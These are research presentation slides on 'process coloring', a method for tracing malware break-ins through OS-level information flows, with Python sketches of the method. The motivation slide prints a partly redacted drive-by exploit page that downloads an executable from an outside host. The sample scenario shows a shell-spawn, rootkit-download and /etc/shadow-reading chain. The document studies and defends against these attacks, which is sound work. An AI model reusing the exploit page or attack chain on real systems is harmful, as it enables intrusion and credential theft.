NICIAR Site Visit, West Lafayette, IN, July 19, 2007. Process Coloring: an Information Flow-Preserving Approach to Malware Investigation. Eugene Spafford, Dongyan Xu (Presenter), Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS)
NICIAR Site Visit, West Lafayette, IN, July 19, 2007 • Process Coloring: an Information Flow-Preserving Approach to Malware Investigation • Eugene Spafford, Dongyan Xu (Presenter), Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University • Xuxian Jiang, Department of Information and Software Engineering, George Mason University
Motivation • Internet malware remains a top threat • Malware: viruses, worms, rootkits, spyware, bots…
Motivation • Upon clicking a malicious URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html • Result:
<html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script> </body></html>
• Slide annotations on the page source: MS05-002, MS03-011, MS04-013 • 22 unwanted programs are installed without the user’s consent!
Our Challenge: Enabling Timely, Efficient Malware Investigation • Raising a timely alert to trigger a malware investigation • Identifying the break-in point of the malware • Reconstructing all contaminations by the malware
[Figure: timeline (Infection → Detection) for today’s log-based intrusion investigation tools (e.g., BackTracker, Taser), showing the log, the external detection point, break-in point trace-back, and contamination reconstruction]
Limitations of Today’s Tools • Long “infection-to-detection” interval • Entire log needed for both trace-back and reconstruction • Questionable trustworthiness of log data
[Figure: the same timeline for existing log-based intrusion investigation tools, with the log marked “?” to indicate questionable trustworthiness]
Goals of Research • Improve malware defense capabilities of enterprise computing infrastructure: • Detection of malware activity • Identification of vulnerable programs/applications • Accountability of computation activities • Recoverability from malware contaminations • Proactive protection of sensitive information/data • Demonstrate via success metrics with respect to: • Timeliness • Efficiency • Accuracy
Goals of Research • Goals fit within NICECAP research themes • “Accountable information flows” • Based on information flow theory • Instantiated at operating system level • Holding malware accountable • “Large-scale system defense” • Targeting large-scale malware infection (e.g., botnets) • Enabling malware detection and remediation • Providing first line of response (applicable to legacy applications w/o source code)
Technical Approach: Process Coloring • Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows • Existing tools only consider direct causality relations without preserving and exploiting break-in provenance information
[Figure: architecture diagram with the labels Attacker; Virtual Machine; Guest OS running Apache, MySQL, DNS, Sendmail, …; Logger; Log; Log Monitor; Virtual Machine Monitor (VMM); runtime alert triggered by log color anomalies]
New Capabilities of Process Coloring • Color-based malware warning (vs. external detection point) • Color-based break-in point identification (vs. back-tracking) • Color-based log partitioning (vs. entire log) for reconstruction
[Figure: timeline (Infection → Detection) showing the break-in point and contamination reconstruction]
Impact of Success • How will it benefit the NIC? • Accountability of NIC cyber infrastructure • Readiness against current and emerging malware threats (e.g., botnets, rootkits, spyware) to NIC • Protection of NIC critical data, information, and computation activities • Reduction of NIC human labor in malware investigation
Impact of Success • How will it benefit the IA community? • Systematic model for OS-level information flows • Mechanisms and policies for elevated accountability of commodity OS • Tools and methods for malware alert, investigation, and recovery • Artifacts, data, insights, and lessons for further malware research
Sample Scenario • Question 1: How is the malware detected? • Question 2: How does the malware break into the system? • Question 3: What does the malware do after break-in?
[Figure: attack graph with the nodes httpd, /bin/sh, wget, Root kit (where the alert is raised), netcat, /etc/shadow and confidential info, and local files]
Existing Approach • 1. Online log collection • Log entries shown on the attack graph:
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
[Figure: attack graph httpd, /bin/sh, wget, Root kit, netcat, /etc/shadow and confidential info, local files; the alert is raised at the external detection point (Root kit)]
Existing Approach • 1. Online log collection • 2. Offline backward tracking [King+, SOSP’03] • Log entries followed backward from the external detection point (alert) to the break-in point:
“wget” CREATES local file(s) - “Root kit”
“/bin/sh” CREATES a new process “wget”
“httpd” CREATES a new process “/bin/sh”
[Figure: backward tracking from Root kit through wget and /bin/sh to httpd, marked “Break-in Point!”]
Existing Approach • 1. Online log collection • 2. Offline backward tracking • 3. Offline forward tracking • Log entries followed forward from the break-in point:
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
[Figure: forward tracking from httpd (“Break-in Point!”) to /bin/sh, wget, Root kit, netcat, /etc/shadow and confidential info, and local files; the alert is raised at the external detection point]
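The two offline passes of the existing approach can be sketched in Python. This is a minimal illustration under stated assumptions, not the BackTracker or Taser algorithm: the `Entry` type, the `flow` helper, and the single-pass traversal over a time-ordered list are hypothetical, and the `sendmail` entry is added only to show that unrelated activity is excluded.

```python
from typing import NamedTuple


class Entry(NamedTuple):
    actor: str   # process performing the operation
    op: str      # "READS", "CREATES", or "MODIFIES"
    obj: str     # process or file acted upon


def flow(entry):
    """Return (source, destination) of the information flow for one entry."""
    if entry.op == "READS":
        return entry.obj, entry.actor   # data moves from the object to the reader
    return entry.actor, entry.obj       # CREATES / MODIFIES push data outward


def backward_track(log, detection_point):
    """Walk the log newest-first, keeping entries that flow into tracked entities."""
    tracked = {detection_point}
    kept = []
    for entry in reversed(log):
        src, dst = flow(entry)
        if dst in tracked:
            tracked.add(src)
            kept.append(entry)
    kept.reverse()
    return kept


def forward_track(log, break_in_point):
    """Walk the log oldest-first, keeping every action of a contaminated actor."""
    tainted = {break_in_point}
    kept = []
    for entry in log:
        if entry.actor in tainted:
            kept.append(entry)
            if entry.op != "READS":
                tainted.add(entry.obj)
    return kept


# Log assumed to be in time order; entries 2-8 mirror the slide's example.
EXAMPLE_LOG = [
    Entry("sendmail", "READS", "/proc/loadavg"),
    Entry("httpd", "READS", "incoming request"),
    Entry("httpd", "CREATES", "/bin/sh"),
    Entry("/bin/sh", "CREATES", "wget"),
    Entry("wget", "CREATES", "Root kit"),
    Entry("/bin/sh", "MODIFIES", "local files"),
    Entry("/bin/sh", "CREATES", "netcat"),
    Entry("netcat", "READS", "/etc/shadow"),
]
```

Calling `backward_track(EXAMPLE_LOG, "Root kit")` walks from the detection point back to `httpd`, and `forward_track(EXAMPLE_LOG, "httpd")` then collects the contamination. Both passes have to scan the entire log, which is the cost the slides attribute to existing tools.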
Process Coloring Approach • 1. Initial coloring • 2. Coloring diffusion • Capability 1: Color-based malware warning • Capability 2: Color-based identification of break-in point • Capability 3: Color-based log partition for contamination analysis
[Figure: init and rc start the services s30sendmail, s55sshd, s45named, and s80httpd, which receive their initial colors; the attack graph (httpd, /bin/sh, wget, Root kit, netcat, /etc/shadow and confidential info, local files) and the log inherit httpd’s color through diffusion]
Timeliness by Process Coloring: Color-Based Malware Warning • Capability 1: Color-based malware warning: “unusual color inheritance”
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = -2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
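A log monitor could flag the “unusual color inheritance” in the log above roughly as follows. This is a hedged sketch: the regular expression is fitted to the line format shown on the slide, and `EXPECTED_PROGRAMS` is a hypothetical policy (which program names are normal for each color), not something the slides specify.

```python
import re

# Matches lines such as: RED: 2568["httpd"]: 63_dup2(5, 2) = 2
LINE_RE = re.compile(
    r'^(?P<color>[A-Z+]+):\s*(?P<pid>\d+)\s*\["(?P<prog>[^"]+)"\]:\s*(?P<call>.*)$'
)

# Assumed policy: programs expected to carry each color.
EXPECTED_PROGRAMS = {"BLUE": {"sendmail"}, "RED": {"httpd"}}


def unusual_inheritance(lines, expected=EXPECTED_PROGRAMS):
    """Return (color, pid, program, call) for entries whose program is
    not expected to carry that color; unparseable lines are skipped."""
    warnings = []
    for line in lines:
        match = LINE_RE.match(line.strip())
        if match is None:
            continue
        color, prog = match["color"], match["prog"]
        if color in expected and prog not in expected[color]:
            warnings.append((color, int(match["pid"]), prog, match["call"]))
    return warnings
```

Applied to the log above, the first warning would be the `sh` entry that follows `execve("/bin//sh", ...)`: a shell carrying the web server's RED color. The alert fires at the moment of break-in and does not wait for an external detection point.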
Timeliness by Process Coloring: Color-Based Malware Warning • Another example: “color mixing”
RED: 1234 ["httpd"]: …
RED: 1234 ["httpd"]: …
RED: 1234 ["httpd"]: …
RED+BLUE: 1234 ["httpd"]: system call to read file index.html
[Figure: bind runs cp defaced.html index.html; httpd then reads index.html]
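Color mixing can be detected by watching each process's color label grow. The sketch below is an illustration only: the `(label, pid, program)` tuple layout and the function names are assumptions, with labels written as on the slide (for example `RED+BLUE`).

```python
def parse_label(label):
    """Split a label such as 'RED+BLUE' into a frozenset of colors."""
    return frozenset(part.strip() for part in label.split("+") if part.strip())


def find_color_mixing(entries):
    """entries: iterable of (label, pid, program) in log order.

    Returns (pid, program, gained_colors) each time a process's label
    holds more than one color and differs from its previous label."""
    seen = {}
    alerts = []
    for label, pid, program in entries:
        colors = parse_label(label)
        previous = seen.get(pid, frozenset())
        if len(colors) > 1 and colors != previous:
            alerts.append((pid, program, sorted(colors - previous)))
        seen[pid] = colors
    return alerts
```

For the slide's example, the `httpd` process with pid 1234 stays RED until it reads `index.html`, at which point the gained color BLUE is reported. In a consolidated server environment, where applications are independent, such an event is a strong warning signal.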
Efficiency by Process Coloring • Capability 2: Color-based break-in point identification • Capability 3: Color-based log partitioning
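Both efficiency capabilities reduce to simple lookups once every log entry carries its colors. The following is a minimal sketch; the `LogEntry` layout and the `INITIAL_COLORING` mapping (sendmail as BLUE, httpd as RED, matching the sample log) are assumptions made for illustration.

```python
from typing import FrozenSet, NamedTuple


class LogEntry(NamedTuple):
    colors: FrozenSet[str]
    pid: int
    program: str
    call: str


# Assumed initial coloring: one distinct color per service at startup.
INITIAL_COLORING = {"sendmail": "BLUE", "httpd": "RED"}


def break_in_candidates(alert_colors, initial_coloring=INITIAL_COLORING):
    """Capability 2: services whose initial color appears on the alerting entry."""
    return sorted(
        service
        for service, color in initial_coloring.items()
        if color in alert_colors
    )


def partition_log(log, color):
    """Capability 3: keep only the entries that carry the given color."""
    return [entry for entry in log if color in entry.colors]
```

The break-in point is read directly off the color of the alerting entry, with no backward tracking, and contamination reconstruction only has to process `partition_log(log, "RED")`, not the whole log.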
Accuracy by Process Coloring • Accuracy of color-based malware warning • False positives and false negatives • Accuracy of malware contamination reconstruction • Sufficiency of log partition (“no useful log entries left out”) • Compare malware action graphs with published malware analysis reports • Limitation of causality-based reconstruction algorithms (e.g., BackTracker, Taser)
Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
[Figure: malware action graph. Process nodes: 2568: httpd; 2568(execve): /bin//sh; 2568(execve): /bin/bash -i; 2586: /bin/rm -rf /tmp/.bugtraq.c; 2587: /bin/cat. Other nodes: inet_sock(80), fd 5, /tmp/.uubugtraq, /tmp/.bugtraq.c. Edge labels: recv, accept, execve, dup2, read, fork, open, write, unlink]
Research Task I: Color Diffusion Model (Month 1-6) • Color Diffusion Model • OS-level Information Flows
Category | Syscalls | Operation | Diffusion
CREATE | create, mkdir, link | create <s1, o1> | color(o1) = color(s1)
CREATE | fork, vfork, clone | create <s1, s2> | color(s2) = color(s1)
READ | read, readv, recv | read <s1, o1> | color(s1) = color(s1) ∪ color(o1)
READ | ptrace | read <s1, s2> | color(s1) = color(s1) ∪ color(s2)
WRITE | write, writev, send | write <s1, o1> | color(o1) = color(s1) ∪ color(o1)
WRITE | ptrace, wait, signal | write <s1, s2> | color(s2) = color(s1) ∪ color(s2)
DESTROY | unlink, rmdir, close | destroy <s1, o1> | (none listed)
DESTROY | exit, kill | destroy <s1, s2> | (none listed)
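The diffusion rules on this slide translate directly into set operations. The sketch below is one possible encoding, assuming colors are held as sets per subject (process) or object (file); the `ColorTable` class is hypothetical, and because the slide lists no diffusion rule for DESTROY, dropping the destroyed entity's entry is an assumption.

```python
from collections import defaultdict


class ColorTable:
    """Tracks the set of colors held by each subject or object."""

    def __init__(self):
        # Unknown entities start with no color.
        self.colors = defaultdict(frozenset)

    def create(self, s1, new):
        # create <s1, o1> / <s1, s2>: the new entity inherits s1's colors.
        self.colors[new] = self.colors[s1]

    def read(self, s1, source):
        # read <s1, o1> / <s1, s2>: the reader absorbs the source's colors.
        self.colors[s1] = self.colors[s1] | self.colors[source]

    def write(self, s1, target):
        # write <s1, o1> / <s1, s2>: the target absorbs the writer's colors.
        self.colors[target] = self.colors[s1] | self.colors[target]

    def destroy(self, s1, target):
        # Assumption: no diffusion; the destroyed entity is simply forgotten.
        self.colors.pop(target, None)
```

A short usage example: after seeding `table.colors["httpd"] = frozenset({"RED"})`, calling `table.create("httpd", "/bin/sh")` gives the shell the color RED, which is the inheritance the warning mechanism relies on.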
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18) • Server-side malware investigation • Consolidated server environment with independent server applications • “Clustered” information flows partitioned by server applications • Color mixing highly unlikely between applications • Client-side malware investigation • Inter-dependent client applications (e.g., text editor → compiler; latex → dvips → ps2pdf) • More inter-application information flows • Legal color mixing exists
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18) • A motivating example of client-side process coloring
[Figure: timeline showing FTP and Quick Tax, joined by a “+”]
Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18) • Profiling legal color mixing inside a client host • Shared files • Helper processes • Approach 1: information flow insulation • Approach 2: information flow border control
[Figure: processes P1 and P2 connected through a shared file, shown next to an insulated shared file]
Related Work Based on Information Flows • Instruction-level information flows • Lacking system-wide semantic information (e.g., info. about processes and files) • Language-level information flows • Focusing on information flows inside a program • Operating-system-level information flows • Complementing the above categories • Revealing system-wide semantic information • Benefiting detection, recovery, and forensics as first line of defense
Metrics: Definitions • Timeliness • Malware infection-to-warning interval • Efficiency • Percentage of log reduction for malware contamination reconstruction • Accuracy • False positive rate of malware warning • False negative rate of malware warning • Correctness of malware action graphs
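The metrics above can be computed as follows. The slide names the metrics but gives no formulas, so the definitions in this sketch are the conventional ones and should be read as assumptions; all function and parameter names are hypothetical.

```python
def infection_to_warning_interval(infection_time, warning_time):
    """Timeliness: time elapsed between infection and the color-based warning."""
    return warning_time - infection_time


def log_reduction_percent(total_entries, partition_entries):
    """Efficiency: share of the log that reconstruction can skip."""
    if total_entries <= 0:
        raise ValueError("total_entries must be positive")
    return 100.0 * (total_entries - partition_entries) / total_entries


def false_positive_rate(false_positives, true_negatives):
    """Accuracy: fraction of benign cases that raised a warning."""
    benign = false_positives + true_negatives
    return false_positives / benign if benign else 0.0


def false_negative_rate(false_negatives, true_positives):
    """Accuracy: fraction of malware cases that raised no warning."""
    malicious = false_negatives + true_positives
    return false_negatives / malicious if malicious else 0.0
```

For instance, if a color partition holds 50 of 1000 log entries, `log_reduction_percent(1000, 50)` reports a 95 percent reduction. Correctness of malware action graphs is not captured here, since the evaluation plan judges it by comparison with published malware analysis reports.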
Metrics: Evaluation Plan • Sources of malware • Repository of malware (worms, botware, rootkits) • Malware captured by honeypots and honeyfarm • Target computing environments • Consolidated servers • Clients • Experiment environments • VM-based honeyfarm (Collapsar) • VM-based malware playground (vGround) • Methodology: Evaluate by comparison • With process coloring • Without process coloring
Project Organization and Management • Purdue Team • Faculty • Eugene Spafford • Dongyan Xu • Graduate students • Ryan Riley • Larissa O’Brien • TBD • Budget • $xxx,xxx • George Mason Team • Faculty • Xuxian Jiang • Graduate student • TBD • Budget • $xxx,xxx
Project Organization and Management
[Figure: 18-month project schedule (Gantt chart) starting June 7th, 2007, with Quarterly Program Reviews and the Site Visit marked. Rows: 1. Task I (Section 3.1); 2. Task II (Section 3.2) with Subtasks II.1, II.2, II.3; 3. Task III (Section 3.3) with Subtasks III.1, III.2, III.3; 4. Meetings and Document Prep; 5. Prototype Instantiation #1, #2, #3. Legend: Software Deliverable, Experiments, Software Demonstrations. Callouts: basic Xen-based prototype; tools for malware investigation; mechanisms for color mixing control]
Project Organization and Management • Spending during Summer’07: • Purdue: One month graduate student support (half-time) • GMU: One month summer salary (planned)
Recent Progress • Identifying color diffusion operations in Linux OS • Starting to implement log coloring and collection on Xen VMM
[Figure: the 18-month project schedule from the Project Organization and Management slide, with a “We are here” marker]
Projected Progress in the Next 3-6 Months • 11/21/07: A comprehensive color diffusion model under Linux • 12/07/07: Demo and software release of basic Xen-based prototype
[Figure: the 18-month project schedule from the Project Organization and Management slide]
Technology Transfer Plan • Potential adopters • Computer forensics/malware investigators and researchers • System administrators • Anti-malware software companies • Open source communities (e.g., XenSource) • Software release and documentation • Presentations and demos to potential NIC adopters • Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)
Thank you! For more information about the Process Coloring project: http://cairo.cs.purdue.edu/projects/pc PC@cs.purdue.edu